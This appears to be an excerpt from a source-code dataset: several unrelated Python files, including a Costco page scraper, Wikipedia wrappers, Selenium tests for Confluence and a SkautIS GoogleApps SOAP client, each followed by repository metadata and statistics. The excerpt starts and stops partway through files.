def fetch_product_details(self):
"""
Initializes webdriver and configures several options specific to Costco scrapping.
"""
options = webdriver.ChromeOptions()
options.add_argument('--incognito')
options.add_argument("--headless")
options.add_argument('--disable-extensions')
options.add_argument('disable-infobars')
driver = webdriver.Chrome(ChromeDriverManager().install(), chrome_options=options)
driver.get(self.product_url)
soup = BeautifulSoup(driver.page_source, 'html.parser')
self.parse_page_content(soup)
return self.__dict__
| 37.941489
| 121
| 0.628628
| 775
| 7,133
| 5.567742
| 0.148387
| 0.152955
| 0.081576
| 0.061182
| 0.86095
| 0.853534
| 0.853534
| 0.853534
| 0.839861
| 0.839861
| 0
| 0.001316
| 0.254171
| 7,133
| 187
| 122
| 38.144385
| 0.809774
| 0.068695
| 0
| 0.801418
| 0
| 0
| 0.119279
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.085106
| false
| 0
| 0.035461
| 0
| 0.177305
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
00be82da89ce20cb5e34e370b07a2f72a4247c94
| 1,854
|
py
|
Python
|
autogoal/contrib/wikipedia/_base.py
|
yacth/autogoal
|
a55c1534161e850587e2ca3533aa2fd5ae28569e
|
[
"MIT"
] | null | null | null |
autogoal/contrib/wikipedia/_base.py
|
yacth/autogoal
|
a55c1534161e850587e2ca3533aa2fd5ae28569e
|
[
"MIT"
] | null | null | null |
autogoal/contrib/wikipedia/_base.py
|
yacth/autogoal
|
a55c1534161e850587e2ca3533aa2fd5ae28569e
|
[
"MIT"
] | null | null | null |
import wikipedia
from autogoal.kb import Word, Entity, Summary, Flags
from autogoal.utils import nice_repr
@nice_repr
class WikipediaSummary:
"""This class find a word in Wikipedia and return a summary in english.
"""
def __init__(self):
pass
def run(self, input: Word(domain='general', language='english'))-> Summary():
"""This method use Word2Vect of gensim for tranform a word in embedding vector.
"""
try:
return wikipedia.summary(input)
except:
return ""
@nice_repr
class WikipediaContainsWord:
"""This class find a word in Wikipedia and return a summary in english.
"""
def __init__(self):
pass
def run(self, input: Word(domain='general', language='english'))-> Flags():
"""This method use Word2Vect of gensim for tranform a word in embedding vector.
"""
return dict(in_wikipedia=bool(wikipedia.search(input)))
@nice_repr
class WikipediaSummarySpanish:
"""This class find a word in Wikipedia and return a summary in Spanish.
"""
def __init__(self):
wikipedia.set_lang("es")
def run(self, input: Word(domain='general', language='spanish'))-> Summary():
"""This method use Word2Vect of gensim for tranform a word in embedding vector.
"""
try:
return wikipedia.summary(input)
except:
return ""
@nice_repr
class WikipediaContainsWordSpanish:
"""This class find a word in Wikipedia and return a summary in Spanish.
"""
def __init__(self):
wikipedia.set_lang("es")
def run(self, input: Word(domain='general', language='spanish'))-> Flags():
"""This method use Word2Vect of gensim for tranform a word in embedding vector.
"""
return dict(in_wikipedia=bool(wikipedia.search(input)))
| 27.671642
| 87
| 0.64671
| 228
| 1,854
| 5.149123
| 0.223684
| 0.034072
| 0.0477
| 0.0477
| 0.827939
| 0.827939
| 0.827939
| 0.827939
| 0.827939
| 0.827939
| 0
| 0.002874
| 0.249191
| 1,854
| 66
| 88
| 28.090909
| 0.840517
| 0.339806
| 0
| 0.666667
| 0
| 0
| 0.051107
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.242424
| false
| 0.060606
| 0.090909
| 0
| 0.636364
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 9
|
daa1a58fc6a2bd553100b97615e46ed4f3d051d2
| 457
|
py
|
Python
|
tests/test_rst_table.py
|
macfreek/restbuilder
|
1492b304b958ba687da8ab148f23f4aa0b699479
|
[
"BSD-2-Clause"
] | 23
|
2018-06-06T13:20:08.000Z
|
2022-02-10T07:21:14.000Z
|
tests/test_rst_table.py
|
macfreek/restbuilder
|
1492b304b958ba687da8ab148f23f4aa0b699479
|
[
"BSD-2-Clause"
] | 23
|
2018-03-19T15:56:31.000Z
|
2022-02-09T13:06:55.000Z
|
tests/test_rst_table.py
|
macfreek/restbuilder
|
1492b304b958ba687da8ab148f23f4aa0b699479
|
[
"BSD-2-Clause"
] | 22
|
2018-05-21T17:16:33.000Z
|
2022-02-17T05:44:31.000Z
|
from tests.utils import run_parse_test
def test_simple_table(src_dir, expected_dir, output_dir):
run_parse_test(src_dir, expected_dir, output_dir, 'common', ['simple-table'])
def test_grid_table(src_dir, expected_dir, output_dir):
run_parse_test(src_dir, expected_dir, output_dir, 'common', ['grid-table'])
def test_list_table(src_dir, expected_dir, output_dir):
run_parse_test(src_dir, expected_dir, output_dir, 'common', ['list-table'])
| 32.642857
| 81
| 0.772429
| 73
| 457
| 4.39726
| 0.232877
| 0.11215
| 0.261682
| 0.317757
| 0.700935
| 0.700935
| 0.700935
| 0.700935
| 0.700935
| 0.700935
| 0
| 0
| 0.107221
| 457
| 13
| 82
| 35.153846
| 0.786765
| 0
| 0
| 0
| 0
| 0
| 0.109409
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.428571
| false
| 0
| 0.142857
| 0
| 0.571429
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
97382da6b3773b5bd22f076077975592d36fe888
| 2,818
|
py
|
Python
|
parser/fase2/team03/parse/functions/functions_aggregate.py
|
webdev188/tytus
|
847071edb17b218f51bb969d335a8ec093d13f94
|
[
"MIT"
] | 1
|
2021-01-09T09:39:57.000Z
|
2021-01-09T09:39:57.000Z
|
parser/fase2/team03/parse/functions/functions_aggregate.py
|
webdev188/tytus
|
847071edb17b218f51bb969d335a8ec093d13f94
|
[
"MIT"
] | null | null | null |
parser/fase2/team03/parse/functions/functions_aggregate.py
|
webdev188/tytus
|
847071edb17b218f51bb969d335a8ec093d13f94
|
[
"MIT"
] | 4
|
2020-12-19T17:12:13.000Z
|
2021-01-07T20:29:53.000Z
|
from parse.ast_node import ASTNode
# From here on, classes describing aggregate functions
# TODO: ALL OF THEM ARE PENDING ON EXECUTION, ONLY DEFINITION HAS BEEN SET
class Avg(ASTNode):
def __init__(self, exp, line, column):
ASTNode.__init__(self, line, column)
self.exp = exp
def execute(self, table, tree):
super().execute(table, tree)
return True
def generate(self, table, tree):
super().generate(table, tree)
return ''
class Count(ASTNode):
def __init__(self, exp, line, column):
ASTNode.__init__(self, line, column)
self.exp = exp
def execute(self, table, tree):
super().execute(table, tree)
return True
def generate(self, table, tree):
super().generate(table, tree)
return ''
class Greatest(ASTNode):
def __init__(self, exp, line, column):
ASTNode.__init__(self, line, column)
self.exp = exp
def execute(self, table, tree):
super().execute(table, tree)
return True
def generate(self, table, tree):
super().generate(table, tree)
return ''
class Least(ASTNode):
def __init__(self, exp, line, column):
ASTNode.__init__(self, line, column)
self.exp = exp
def execute(self, table, tree):
super().execute(table, tree)
return True
def generate(self, table, tree):
super().generate(table, tree)
return ''
class Max(ASTNode):
def __init__(self, exp, line, column):
ASTNode.__init__(self, line, column)
self.exp = exp
def execute(self, table, tree):
super().execute(table, tree)
return True
def generate(self, table, tree):
super().generate(table, tree)
return ''
class Min(ASTNode):
def __init__(self, exp, line, column):
ASTNode.__init__(self, line, column)
self.exp = exp
def execute(self, table, tree):
super().execute(table, tree)
return True
def generate(self, table, tree):
super().generate(table, tree)
return ''
class Sum(ASTNode):
def __init__(self, exp, line, column):
ASTNode.__init__(self, line, column)
self.exp = exp
def execute(self, table, tree):
super().execute(table, tree)
return True
def generate(self, table, tree):
super().generate(table, tree)
return ''
class Top(ASTNode):
def __init__(self, exp, line, column):
ASTNode.__init__(self, line, column)
self.exp = exp
def execute(self, table, tree):
super().execute(table, tree)
return True
def generate(self, table, tree):
super().generate(table, tree)
return ''
def test():
avg = Avg('123', 1, 2)
avg.execute('1', '2')
test()
| 22.725806
| 74
| 0.596167
| 342
| 2,818
| 4.722222
| 0.146199
| 0.178328
| 0.128793
| 0.178328
| 0.873684
| 0.873684
| 0.873684
| 0.873684
| 0.873684
| 0.873684
| 0
| 0.003455
| 0.28105
| 2,818
| 123
| 75
| 22.910569
| 0.793682
| 0.044358
| 0
| 0.847059
| 0
| 0
| 0.001859
| 0
| 0
| 0
| 0
| 0.00813
| 0
| 1
| 0.294118
| false
| 0
| 0.011765
| 0
| 0.588235
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 10
|
97a2e158e5d674475f8e585f80d8538c7e2459fd
| 1,727
|
py
|
Python
|
app/selenium_ui/confluence_ui.py
|
AKStratus/dc-app-performance-toolkit
|
f2e264dd87969a075a69ebededea1c73dc3798d6
|
[
"Apache-2.0"
] | null | null | null |
app/selenium_ui/confluence_ui.py
|
AKStratus/dc-app-performance-toolkit
|
f2e264dd87969a075a69ebededea1c73dc3798d6
|
[
"Apache-2.0"
] | null | null | null |
app/selenium_ui/confluence_ui.py
|
AKStratus/dc-app-performance-toolkit
|
f2e264dd87969a075a69ebededea1c73dc3798d6
|
[
"Apache-2.0"
] | null | null | null |
from selenium_ui.confluence import modules
from extension.confluence import extension_ui # noqa F401
# this action should be the first one
def test_0_selenium_a_login(confluence_webdriver, confluence_datasets, confluence_screen_shots):
modules.login(confluence_webdriver, confluence_datasets)
def test_1_selenium_custom_action(confluence_webdriver, confluence_datasets, confluence_screen_shots):
extension_ui.app_specific_action(confluence_webdriver, confluence_datasets)
def test_1_selenium_view_page(confluence_webdriver, confluence_datasets, confluence_screen_shots):
modules.view_page(confluence_webdriver, confluence_datasets)
def test_1_selenium_create_page(confluence_webdriver, confluence_datasets, confluence_screen_shots):
modules.create_confluence_page(confluence_webdriver, confluence_datasets)
def test_1_selenium_edit_page(confluence_webdriver, confluence_datasets, confluence_screen_shots):
modules.edit_confluence_page(confluence_webdriver, confluence_datasets)
def test_1_selenium_create_comment(confluence_webdriver, confluence_datasets, confluence_screen_shots):
modules.create_comment(confluence_webdriver, confluence_datasets)
def test_1_selenium_view_blog(confluence_webdriver, confluence_datasets, confluence_screen_shots):
modules.view_blog(confluence_webdriver, confluence_datasets)
def test_1_selenium_view_dashboard(confluence_webdriver, confluence_datasets, confluence_screen_shots):
modules.view_dashboard(confluence_webdriver, confluence_datasets)
# this action should be the last one
def test_2_selenium_z_log_out(confluence_webdriver, confluence_datasets, confluence_screen_shots):
modules.log_out(confluence_webdriver, confluence_datasets)
| 44.282051
| 103
| 0.872032
| 212
| 1,727
| 6.608491
| 0.193396
| 0.244111
| 0.372591
| 0.475375
| 0.878658
| 0.832976
| 0.743041
| 0.701642
| 0.571021
| 0.144897
| 0
| 0.007538
| 0.07817
| 1,727
| 38
| 104
| 45.447368
| 0.872487
| 0.046323
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.45
| false
| 0
| 0.1
| 0
| 0.55
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
97b5fc2a1ca2d4ee14bae564e2facf8e8325bc59
| 166
|
py
|
Python
|
performance_tool.py
|
Mike-Scarlet/general_python_utils
|
9ec051a85f2c3c1d1da49307a8675f00051bdd57
|
[
"MIT"
] | null | null | null |
performance_tool.py
|
Mike-Scarlet/general_python_utils
|
9ec051a85f2c3c1d1da49307a8675f00051bdd57
|
[
"MIT"
] | null | null | null |
performance_tool.py
|
Mike-Scarlet/general_python_utils
|
9ec051a85f2c3c1d1da49307a8675f00051bdd57
|
[
"MIT"
] | null | null | null |
import time
class TimeInstance:
def __init__(self) -> None:
self.create_time = time.time()
def ElapsedTime(self):
return time.time() - self.create_time
| 18.444444
| 41
| 0.698795
| 22
| 166
| 5
| 0.5
| 0.218182
| 0.254545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.186747
| 166
| 9
| 41
| 18.444444
| 0.814815
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.166667
| 0.166667
| 0.833333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
c102566b7152d483af22c1fe89f832812f83b884
| 186
|
py
|
Python
|
pythonrestclient/__init__.py
|
Hawk73/python-rest-client
|
0a02af86f20a9cddec1f67752a0018e51a7bc82f
|
[
"MIT"
] | 1
|
2020-06-06T08:32:06.000Z
|
2020-06-06T08:32:06.000Z
|
pythonrestclient/__init__.py
|
Hawk73/python-rest-client
|
0a02af86f20a9cddec1f67752a0018e51a7bc82f
|
[
"MIT"
] | 1
|
2017-03-30T08:20:14.000Z
|
2017-03-30T10:19:14.000Z
|
pythonrestclient/__init__.py
|
Hawk73/python-rest-client
|
0a02af86f20a9cddec1f67752a0018e51a7bc82f
|
[
"MIT"
] | 1
|
2017-06-06T17:45:22.000Z
|
2017-06-06T17:45:22.000Z
|
from pythonrestclient.service_factory import ServiceFactory
from pythonrestclient.models.post_model import PostModel
from pythonrestclient.models.collection_class import CollectionClass
| 46.5
| 68
| 0.908602
| 20
| 186
| 8.3
| 0.65
| 0.361446
| 0.313253
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.064516
| 186
| 3
| 69
| 62
| 0.954023
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
c136ba869848eda2e8436ba184dd3dc4ab2a8c92
| 35,654
|
py
|
Python
|
skautis/GoogleApps.py
|
janmpeterka/skautis-py
|
d335728c01d58e3c9dfab8c0b044117b177b8807
|
[
"BSD-3-Clause"
] | 6
|
2019-03-19T08:34:17.000Z
|
2022-01-20T19:28:17.000Z
|
skautis/GoogleApps.py
|
skaut/skautis-py
|
d335728c01d58e3c9dfab8c0b044117b177b8807
|
[
"BSD-3-Clause"
] | 4
|
2021-09-12T09:13:47.000Z
|
2022-01-16T08:39:05.000Z
|
skautis/GoogleApps.py
|
janmpeterka/skautis-py
|
d335728c01d58e3c9dfab8c0b044117b177b8807
|
[
"BSD-3-Clause"
] | 2
|
2021-09-26T11:01:29.000Z
|
2021-12-28T14:41:46.000Z
|
# -*- coding: utf-8 -*-
import zeep
# Webová služba pro práci s GoogleApps (zápis dat do databáze, komunikace s GoogleApps)
class GoogleApps(object):
__module__ = 'skautis'
def __init__(self, test):
if test:
self._client = zeep.Client('https://test-is.skaut.cz/JunakWebservice/GoogleApps.asmx?wsdl')
else:
self._client = zeep.Client('https://is.skaut.cz/JunakWebservice/GoogleApps.asmx?wsdl')
# Načíst seznam google skupin pro synchronizaci
def GoogleGroupAllSync(self, ID_Login):
return self._client.service.GoogleGroupAllSync({"ID_Login": ID_Login})
# Načíst seznam požadavků na synchronizaci
def GoogleGroupSyncRequestAll(self, ID_Login, ID_GoogleGroup, ID):
return self._client.service.GoogleGroupSyncRequestAll({"ID_Login": ID_Login, "ID_GoogleGroup": ID_GoogleGroup, "ID": ID})
# Načíst seznam nastavení synchronizace Google skupiny
def GoogleGroupSyncSettingsAll(self, ID_Login, ID_GoogleGroup, ID, ID_SyncLevelType=None, ID_SyncType=None):
return self._client.service.GoogleGroupSyncSettingsAll({"ID_Login": ID_Login, "ID_GoogleGroup": ID_GoogleGroup, "ID": ID, "ID_SyncLevelType": ID_SyncLevelType, "ID_SyncType": ID_SyncType})
# Smazat nastavení synchronizace Google skupiny
def GoogleGroupSyncSettingsDelete(self, ID_Login, ID, ID_GoogleGroup, IsFunction, ID_Unit, GoogleGroup=None, ID_SyncLevelType=None, SyncLevelType=None, Units=None, SyncContactTypes=None, MembershipCategories=None, FunctionsDirect=None, Functions=None, ID_UnitType=None):
return self._client.service.GoogleGroupSyncSettingsDelete({"ID_Login": ID_Login, "ID": ID, "ID_GoogleGroup": ID_GoogleGroup, "IsFunction": IsFunction, "ID_Unit": ID_Unit, "GoogleGroup": GoogleGroup, "ID_SyncLevelType": ID_SyncLevelType, "SyncLevelType": SyncLevelType, "Units": Units, "SyncContactTypes": SyncContactTypes, "MembershipCategories": MembershipCategories, "FunctionsDirect": FunctionsDirect, "Functions": Functions, "ID_UnitType": ID_UnitType})
# Založit nastavení synchronizace Google skupiny
def GoogleGroupSyncSettingsInsert(self, ID_Login, ID, ID_GoogleGroup, IsFunction, ID_Unit, GoogleGroup=None, ID_SyncLevelType=None, SyncLevelType=None, Units=None, SyncContactTypes=None, MembershipCategories=None, FunctionsDirect=None, Functions=None, ID_UnitType=None):
return self._client.service.GoogleGroupSyncSettingsInsert({"ID_Login": ID_Login, "ID": ID, "ID_GoogleGroup": ID_GoogleGroup, "IsFunction": IsFunction, "ID_Unit": ID_Unit, "GoogleGroup": GoogleGroup, "ID_SyncLevelType": ID_SyncLevelType, "SyncLevelType": SyncLevelType, "Units": Units, "SyncContactTypes": SyncContactTypes, "MembershipCategories": MembershipCategories, "FunctionsDirect": FunctionsDirect, "Functions": Functions, "ID_UnitType": ID_UnitType})
# Upravit typ synchronizace google skupiny
def GoogleGroupUpdateSyncType(self, ID_Login, ID, ID_Unit, DateCreate, ID_GoogleGroupMain, ID_Domain, MemberCount, Valid, LastSync, DisplayName=None, Email=None, Unit=None, RegistrationNumber=None, GoogleGroupMainEmail=None, Description=None, EmailName=None, OwnerEmail=None, ID_SyncType=None):
return self._client.service.GoogleGroupUpdateSyncType({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "DateCreate": DateCreate, "ID_GoogleGroupMain": ID_GoogleGroupMain, "ID_Domain": ID_Domain, "MemberCount": MemberCount, "Valid": Valid, "LastSync": LastSync, "DisplayName": DisplayName, "Email": Email, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "GoogleGroupMainEmail": GoogleGroupMainEmail, "Description": Description, "EmailName": EmailName, "OwnerEmail": OwnerEmail, "ID_SyncType": ID_SyncType})
# Synchronizovat google skupinu
def GoogleGroupUpdateSync(self, ID_Login, ID, ID_Unit, DateCreate, ID_GoogleGroupMain, ID_Domain, MemberCount, Valid, LastSync, DisplayName=None, Email=None, Unit=None, RegistrationNumber=None, GoogleGroupMainEmail=None, Description=None, EmailName=None, OwnerEmail=None, ID_SyncType=None):
return self._client.service.GoogleGroupUpdateSync({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "DateCreate": DateCreate, "ID_GoogleGroupMain": ID_GoogleGroupMain, "ID_Domain": ID_Domain, "MemberCount": MemberCount, "Valid": Valid, "LastSync": LastSync, "DisplayName": DisplayName, "Email": Email, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "GoogleGroupMainEmail": GoogleGroupMainEmail, "Description": Description, "EmailName": EmailName, "OwnerEmail": OwnerEmail, "ID_SyncType": ID_SyncType})
# Založit požadavek na synchronizaci
def GoogleGroupSyncRequestInsert(self, ID_Login, ID, ID_GoogleGroup, Created, Synced, IsSyncing, GoogleGroup=None, Exception=None):
return self._client.service.GoogleGroupSyncRequestInsert({"ID_Login": ID_Login, "ID": ID, "ID_GoogleGroup": ID_GoogleGroup, "Created": Created, "Synced": Synced, "IsSyncing": IsSyncing, "GoogleGroup": GoogleGroup, "Exception": Exception})
# Dokončit požadavek na synchronizaci
def GoogleGroupSyncRequestUpdateError(self, ID_Login, ID, ID_GoogleGroup, Created, Synced, IsSyncing, GoogleGroup=None, Exception=None):
return self._client.service.GoogleGroupSyncRequestUpdateError({"ID_Login": ID_Login, "ID": ID, "ID_GoogleGroup": ID_GoogleGroup, "Created": Created, "Synced": Synced, "IsSyncing": IsSyncing, "GoogleGroup": GoogleGroup, "Exception": Exception})
# Dokončit požadavek na synchronizaci
def GoogleGroupSyncRequestUpdateFinish(self, ID_Login, ID, ID_GoogleGroup, Created, Synced, IsSyncing, GoogleGroup=None, Exception=None):
return self._client.service.GoogleGroupSyncRequestUpdateFinish({"ID_Login": ID_Login, "ID": ID, "ID_GoogleGroup": ID_GoogleGroup, "Created": Created, "Synced": Synced, "IsSyncing": IsSyncing, "GoogleGroup": GoogleGroup, "Exception": Exception})
# Načíst detail nastavení synchronizace Google skupiny
def GoogleGroupSyncSettingsDetail(self, ID_Login, ID, ID_GoogleGroup):
return self._client.service.GoogleGroupSyncSettingsDetail({"ID_Login": ID_Login, "ID": ID, "ID_GoogleGroup": ID_GoogleGroup})
# Upravit nastavení synchronizace Google skupiny
def GoogleGroupSyncSettingsUpdate(self, ID_Login, ID, ID_GoogleGroup, IsFunction, ID_Unit, GoogleGroup=None, ID_SyncLevelType=None, SyncLevelType=None, Units=None, SyncContactTypes=None, MembershipCategories=None, FunctionsDirect=None, Functions=None, ID_UnitType=None):
return self._client.service.GoogleGroupSyncSettingsUpdate({"ID_Login": ID_Login, "ID": ID, "ID_GoogleGroup": ID_GoogleGroup, "IsFunction": IsFunction, "ID_Unit": ID_Unit, "GoogleGroup": GoogleGroup, "ID_SyncLevelType": ID_SyncLevelType, "SyncLevelType": SyncLevelType, "Units": Units, "SyncContactTypes": SyncContactTypes, "MembershipCategories": MembershipCategories, "FunctionsDirect": FunctionsDirect, "Functions": Functions, "ID_UnitType": ID_UnitType})
# Typ kontaktu pro synchronizaci
def SyncContactTypeAll(self, ID_Login, ID=None, DisplayName=None):
return self._client.service.SyncContactTypeAll({"ID_Login": ID_Login, "ID": ID, "DisplayName": DisplayName})
# No documentation
def SyncLevelTypeAll(self, ID_Login, ID=None, DisplayName=None):
return self._client.service.SyncLevelTypeAll({"ID_Login": ID_Login, "ID": ID, "DisplayName": DisplayName})
# Načíst seznam typů funkce v nastavení Google skupiny
def SyncSettingsFunctionTypeAll(self, ID_Login, ID_GoogleGroupSyncSettings, ID, ID_FunctionType):
return self._client.service.SyncSettingsFunctionTypeAll({"ID_Login": ID_Login, "ID_GoogleGroupSyncSettings": ID_GoogleGroupSyncSettings, "ID": ID, "ID_FunctionType": ID_FunctionType})
# Smazat typ funkce v nastavení Google skupiny
def SyncSettingsFunctionTypeDelete(self, ID_Login, ID, ID_GoogleGroupSyncSettings, ID_FunctionType, IsDirect, FunctionType=None):
return self._client.service.SyncSettingsFunctionTypeDelete({"ID_Login": ID_Login, "ID": ID, "ID_GoogleGroupSyncSettings": ID_GoogleGroupSyncSettings, "ID_FunctionType": ID_FunctionType, "IsDirect": IsDirect, "FunctionType": FunctionType})
# Založit typ funkce v nastavení Google skupiny
def SyncSettingsFunctionTypeInsert(self, ID_Login, ID, ID_GoogleGroupSyncSettings, ID_FunctionType, IsDirect, FunctionType=None):
return self._client.service.SyncSettingsFunctionTypeInsert({"ID_Login": ID_Login, "ID": ID, "ID_GoogleGroupSyncSettings": ID_GoogleGroupSyncSettings, "ID_FunctionType": ID_FunctionType, "IsDirect": IsDirect, "FunctionType": FunctionType})
# Načíst seznam kategorií členství v nastavení synchronizace Google skupiny
def SyncSettingsMembershipCategoryAll(self, ID_Login, ID_GoogleGroupSyncSettings, ID, ID_MembershipCategory=None):
return self._client.service.SyncSettingsMembershipCategoryAll({"ID_Login": ID_Login, "ID_GoogleGroupSyncSettings": ID_GoogleGroupSyncSettings, "ID": ID, "ID_MembershipCategory": ID_MembershipCategory})
# Smazat kategorii členství v nastavení synchronizace Google skupiny
def SyncSettingsMembershipCategoryDelete(self, ID_Login, ID, ID_GoogleGroupSyncSettings, MembershipCategories=None, ID_MembershipCategory=None, MembershipCategory=None, DisplayName=None):
return self._client.service.SyncSettingsMembershipCategoryDelete({"ID_Login": ID_Login, "ID": ID, "ID_GoogleGroupSyncSettings": ID_GoogleGroupSyncSettings, "MembershipCategories": MembershipCategories, "ID_MembershipCategory": ID_MembershipCategory, "MembershipCategory": MembershipCategory, "DisplayName": DisplayName})
# Založit kategorii členství v nastavení synchronizace Google skupiny
def SyncSettingsMembershipCategoryInsert(self, ID_Login, ID, ID_GoogleGroupSyncSettings, MembershipCategories=None, ID_MembershipCategory=None, MembershipCategory=None, DisplayName=None):
return self._client.service.SyncSettingsMembershipCategoryInsert({"ID_Login": ID_Login, "ID": ID, "ID_GoogleGroupSyncSettings": ID_GoogleGroupSyncSettings, "MembershipCategories": MembershipCategories, "ID_MembershipCategory": ID_MembershipCategory, "MembershipCategory": MembershipCategory, "DisplayName": DisplayName})
# Načíst seznam typů kontaktu v nastavení synchronizace Google skupiny
def SyncSettingsSyncContactTypeAll(self, ID_Login, ID_GoogleGroupSyncSettings, ID, ID_SyncContactType=None):
return self._client.service.SyncSettingsSyncContactTypeAll({"ID_Login": ID_Login, "ID_GoogleGroupSyncSettings": ID_GoogleGroupSyncSettings, "ID": ID, "ID_SyncContactType": ID_SyncContactType})
# Založit typ kontaktu nastavení synchronizace Google skupiny
def SyncSettingsSyncContactTypeInsert(self, ID_Login, ID, ID_GoogleGroupSyncSettings, ID_SyncContactType=None, SyncContactType=None):
return self._client.service.SyncSettingsSyncContactTypeInsert({"ID_Login": ID_Login, "ID": ID, "ID_GoogleGroupSyncSettings": ID_GoogleGroupSyncSettings, "ID_SyncContactType": ID_SyncContactType, "SyncContactType": SyncContactType})
# Smazat typ kontaktu nastavení synchronizace Google skupiny
def SyncSettingsSyncContactTypeDelete(self, ID_Login, ID, ID_GoogleGroupSyncSettings, ID_SyncContactType=None, SyncContactType=None):
return self._client.service.SyncSettingsSyncContactTypeDelete({"ID_Login": ID_Login, "ID": ID, "ID_GoogleGroupSyncSettings": ID_GoogleGroupSyncSettings, "ID_SyncContactType": ID_SyncContactType, "SyncContactType": SyncContactType})
# Načíst seznam jednotek v nastavení Google skupiny
def SyncSettingsUnitAll(self, ID_Login, ID_GoogleGroupSyncSettings, ID, ID_Unit):
return self._client.service.SyncSettingsUnitAll({"ID_Login": ID_Login, "ID_GoogleGroupSyncSettings": ID_GoogleGroupSyncSettings, "ID": ID, "ID_Unit": ID_Unit})
# Smazat jednotku v nastavení Google skupiny
def SyncSettingsUnitDelete(self, ID_Login, ID, ID_GoogleGroupSyncSettings, ID_Unit, Units=None, Unit=None, RegistrationNumber=None, DisplayName=None):
return self._client.service.SyncSettingsUnitDelete({"ID_Login": ID_Login, "ID": ID, "ID_GoogleGroupSyncSettings": ID_GoogleGroupSyncSettings, "ID_Unit": ID_Unit, "Units": Units, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "DisplayName": DisplayName})
# Založit jednotku v nastavení Google skupiny
def SyncSettingsUnitInsert(self, ID_Login, ID, ID_GoogleGroupSyncSettings, ID_Unit, Units=None, Unit=None, RegistrationNumber=None, DisplayName=None):
return self._client.service.SyncSettingsUnitInsert({"ID_Login": ID_Login, "ID": ID, "ID_GoogleGroupSyncSettings": ID_GoogleGroupSyncSettings, "ID_Unit": ID_Unit, "Units": Units, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "DisplayName": DisplayName})
# No documentation
def SyncTypeAll(self, ID_Login, ID=None, DisplayName=None):
return self._client.service.SyncTypeAll({"ID_Login": ID_Login, "ID": ID, "DisplayName": DisplayName})
# Načíst seznam GA účtů ke smazání
def GoogleAccountAllInactive(self, ID_Login):
return self._client.service.GoogleAccountAllInactive({"ID_Login": ID_Login})
# Načíst seznam GA skupin ke smazání
def GoogleGroupAllInactive(self, ID_Login):
return self._client.service.GoogleGroupAllInactive({"ID_Login": ID_Login})
# Načíst seznam správců domény
def DomainAdminAll(self, ID_Login, ID_Domain, ID, ID_Person):
return self._client.service.DomainAdminAll({"ID_Login": ID_Login, "ID_Domain": ID_Domain, "ID": ID, "ID_Person": ID_Person})
# Načíst seznam správců domény
def DomainAdminAllPerson(self, ID_Login, ID_Domain, ID, ID_Person):
return self._client.service.DomainAdminAllPerson({"ID_Login": ID_Login, "ID_Domain": ID_Domain, "ID": ID, "ID_Person": ID_Person})
# Smazat správce domény
def DomainAdminDelete(self, ID_Login, ID):
return self._client.service.DomainAdminDelete({"ID_Login": ID_Login, "ID": ID})
# Založit správce domény
def DomainAdminInsert(self, ID_Login, ID, ID_Domain, ID_Person, Domain=None, Person=None):
return self._client.service.DomainAdminInsert({"ID_Login": ID_Login, "ID": ID, "ID_Domain": ID_Domain, "ID_Person": ID_Person, "Domain": Domain, "Person": Person})
# Načíst seznam domén
